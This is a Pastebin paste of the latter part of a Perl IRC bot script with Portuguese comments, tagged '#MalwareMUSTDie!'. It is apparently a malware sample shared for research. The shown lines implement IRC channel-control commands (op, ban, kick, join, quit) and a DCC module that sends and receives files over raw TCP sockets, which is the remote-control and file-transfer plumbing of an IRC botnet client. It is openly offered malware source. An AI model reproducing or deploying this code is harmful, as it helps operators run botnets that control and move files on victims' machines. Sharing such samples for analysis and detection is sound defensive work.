  665. }
  666. sub deop {
  667.    return unless $#_ == 1;
  668.    sendraw("MODE $_[0] -o $_[1]");
  669. }
  670. sub hop {
  671.     return unless $#_ == 1;
  672.    sendraw("MODE $_[0] +h $_[1]");
  673. }
  674. sub dehop {
  675.    return unless $#_ == 1;
  676.    sendraw("MODE $_[0] +h $_[1]");
  677. }
  678. sub voice {
  679.    return unless $#_ == 1;
  680.    sendraw("MODE $_[0] +v $_[1]");
  681. }
  682. sub devoice {
  683.    return unless $#_ == 1;
  684.    sendraw("MODE $_[0] -v $_[1]");
  685. }
  686. sub ban {
  687.    return unless $#_ == 1;
  688.    sendraw("MODE $_[0] +b $_[1]");
  689. }
  690. sub unban {
  691.    return unless $#_ == 1;
  692.    sendraw("MODE $_[0] -b $_[1]");
  693. }
  694. sub kick {
  695.    return unless $#_ == 1;
  696.    sendraw("KICK $_[0] $_[1] :$_[2]");
  697. }
  698.  
  699. sub modo {
  700.    return unless $#_ == 0;
  701.    sendraw("MODE $_[0] $_[1]");
  702. }
  703. sub mode { modo(@_); }
  704.  
  705. sub j { &join(@_); }
  706. sub join {
  707.    return unless $#_ == 0;
  708.    sendraw("JOIN $_[0]");
  709. }
  710. sub p { part(@_); }
  711. sub part {sendraw("PART $_[0]");}
  712.  
  713. sub nick {
  714.   return unless $#_ == 0;
  715.   sendraw("NICK $_[0]");
  716. }
  717.  
  718. sub invite {
  719.    return unless $#_ == 1;
  720.    sendraw("INVITE $_[1] $_[0]");
  721. }
  722. sub topico {
  723.    return unless $#_ == 1;
  724.    sendraw("TOPIC $_[0] $_[1]");
  725. }
  726. sub topic { topico(@_); }
  727.  
  728. sub whois {
  729.   sendraw("WHOIS $_[0]");
  730. }
  731. sub who {
  732.   return unless $#_ == 0;
  733.   sendraw("WHO $_[0]");
  734. }
  735. sub names {
  736.   return unless $#_ == 0;
  737.   sendraw("NAMES $_[0]");
  738. }
  739. sub away {
  740.   sendraw("AWAY $_[0]");
  741. }
  742. sub back { away(); }
  743. sub quit {
  744.   sendraw("QUIT :$_[0]");
  745.   exit;
  746. }
  747.  
  748. # DCC
  749. package DCC;
  750.  
  751. sub connections {
  752.    my @ready = $dcc_sel->can_read(1);
  753. #   return unless (@ready);
  754.    foreach my $fh (@ready) {
  755.      my $dcctipo = $DCC{$fh}{tipo};
  756.      my $arquivo = $DCC{$fh}{arquivo};
  757.      my $bytes = $DCC{$fh}{bytes};
  758.      my $cur_byte = $DCC{$fh}{curbyte};
  759.      my $nick = $DCC{$fh}{nick};
  760.  
  761.      my $msg;
  762.      my $nread = sysread($fh, $msg, 10240);
  763.  
  764.      if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
  765.         $DCC{$fh}{status} = "Cancelado";
  766.         $DCC{$fh}{ftime} = time;
  767.         $dcc_sel->remove($fh);
  768.         $fh->close;
  769.         next;
  770.      }
  771.  
  772.      if ($dcctipo eq "get") {
  773.         $DCC{$fh}{curbyte} += length($msg);
  774.  
  775.         my $cur_byte = $DCC{$fh}{curbyte};
  776.  
  777.         open(FILE, ">> $arquivo");
  778.         print FILE "$msg" if ($cur_byte <= $bytes);
  779.         close(FILE);
  780.  
  781.         my $packbyte = pack("N", $cur_byte);
  782.         print $fh "$packbyte";
  783.  
  784.         if ($bytes == $cur_byte) {
  785.            $dcc_sel->remove($fh);
  786.            $fh->close;
  787.            $DCC{$fh}{status} = "Recebido";
  788.            $DCC{$fh}{ftime} = time;
  789.            next;
  790.         }
  791.      } elsif ($dcctipo eq "send") {
  792.           my $send = $fh->accept;
  793.           $send->autoflush(1);
  794.           $dcc_sel->add($send);
  795.           $dcc_sel->remove($fh);
  796.           $DCC{$send}{tipo} = 'sendcon';
  797.           $DCC{$send}{itime} = time;
  798.           $DCC{$send}{nick} = $nick;
  799.           $DCC{$send}{bytes} = $bytes;
  800.           $DCC{$send}{curbyte} = 0;
  801.           $DCC{$send}{arquivo} = $arquivo;
  802.           $DCC{$send}{ip} = $send->peerhost;
  803.           $DCC{$send}{porta} = $send->peerport;
  804.           $DCC{$send}{status} = "Enviando";
  805.  
  806.           #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
  807.           open(FILE, "< $arquivo");
  808.           my $fbytes;
  809.           read(FILE, $fbytes, 1024);
  810.           print $send "$fbytes";
  811.           close FILE;
  812. #          delete($DCC{$fh});
  813.      } elsif ($dcctipo eq 'sendcon') {
  814.           my $bytes_sended = unpack("N", $msg);
  815.           $DCC{$fh}{curbyte} = $bytes_sended;
  816.           if ($bytes_sended == $bytes) {
  817.              $fh->close;
  818.              $dcc_sel->remove($fh);
  819.              $DCC{$fh}{status} = "Enviado";
  820.              $DCC{$fh}{ftime} = time;
  821.              next;
  822.           }
  823.           open(SENDFILE, "< $arquivo");
  824.           seek(SENDFILE, $bytes_sended, 0);
  825.           my $send_bytes;
  826.           read(SENDFILE, $send_bytes, 1024);
  827.           print $fh "$send_bytes";
  828.           close(SENDFILE);
  829.      }
  830.    }
  831. }
  832.  
  833.  
  834. sub SEND {
  835.   my ($nick, $arquivo) = @_;
  836.   unless (-r "$arquivo") {
  837.     return(0);
  838.   }
  839.  
  840.   my $dccark = $arquivo;
  841.   $dccark =~ s/[.*\/](\S+)/$1/;
  842.  
  843.   my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
  844.   my $longip = unpack("N",inet_aton($meuip));
  845.  
  846.   my @filestat = stat($arquivo);
  847.   my $size_total=$filestat[7];
  848.   if ($size_total == 0) {
  849.      return(0);
  850.   }
  851.  
  852.   my ($porta, $sendsock);
  853.   do {
  854.     $porta = int rand(64511);
  855.     $porta += 1024;
  856.     $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
  857.   } until $sendsock;
  858.  
  859.   $DCC{$sendsock}{tipo} = 'send';
  860.   $DCC{$sendsock}{nick} = $nick;
  861.   $DCC{$sendsock}{bytes} = $size_total;
  862.   $DCC{$sendsock}{arquivo} = $arquivo;
  863.  
  864.  
  865.   &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
  866.  
  867. }
  868.  
  869. sub GET {
  870.   my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
  871.   return(0) if (-e "$arquivo");
  872.   if (open(FILE, "> $arquivo")) {
  873.      close FILE;
  874.   } else {
  875.     return(0);
  876.   }
  877.  
  878.   my $dccip=fixaddr($dcclongip);
  879.   return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
  880.   my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
  881.   $dccsock->autoflush(1);
  882.   $dcc_sel->add($dccsock);
  883.   $DCC{$dccsock}{tipo} = 'get';
  884.   $DCC{$dccsock}{itime} = time;
  885.   $DCC{$dccsock}{nick} = $nick;
  886.   $DCC{$dccsock}{bytes} = $bytes;
  887.   $DCC{$dccsock}{curbyte} = 0;
  888.   $DCC{$dccsock}{arquivo} = $arquivo;
  889.   $DCC{$dccsock}{ip} = $dccip;
  890.   $DCC{$dccsock}{porta} = $dccporta;
  891.   $DCC{$dccsock}{status} = "Recebendo";
  892. }
  893.  
  894. # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
  895. sub Status {
  896.   my $socket = shift;
  897.   my $sock_tipo = $DCC{$socket}{tipo};
  898.   unless (lc($sock_tipo) eq "chat") {
  899.     my $nick = $DCC{$socket}{nick};
  900.     my $arquivo = $DCC{$socket}{arquivo};
  901.     my $itime = $DCC{$socket}{itime};
  902.     my $ftime = time;
  903.     my $status = $DCC{$socket}{status};
  904.     $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
  905.  
  906.     my $d_time = $ftime-$itime;
  907.  
  908.     my $cur_byte = $DCC{$socket}{curbyte};
  909.     my $bytes_total =  $DCC{$socket}{bytes};
  910.  
  911.     my $rate = 0;
  912.     $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
  913.     my $porcen = ($cur_byte*100)/$bytes_total;
  914.  
  915.     my ($r_duv, $p_duv);
  916.     if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
  917.        $r_duv = $3; $r_duv++ if $4 >= 5;
  918.        $rate = "$1\.$2"."$r_duv";
  919.     }
  920.     if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
  921.        $p_duv = $3; $p_duv++ if $4 >= 5;
  922.        $porcen = "$1\.$2"."$p_duv";
  923.     }
  924.     return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
  925.   }
  926.  
  927.  
  928.   return(0);
  929. }
  930.  
  931.  
  932. # esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
  933. sub fixaddr {
  934.     my ($address) = @_;
  935.  
  936.     chomp $address;     # just in case, sigh.
  937.     if ($address =~ /^\d+$/) {
  938.         return inet_ntoa(pack "N", $address);
  939.     } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
  940.         return $address;
  941.     } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
  942.         return inet_ntoa(((gethostbyname($address))[4])[0]);
  943.     } else {
  944.         return;
  945.     }
  946. }
  947.  
  948. ---
  949. #MalwareMUSTDie!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top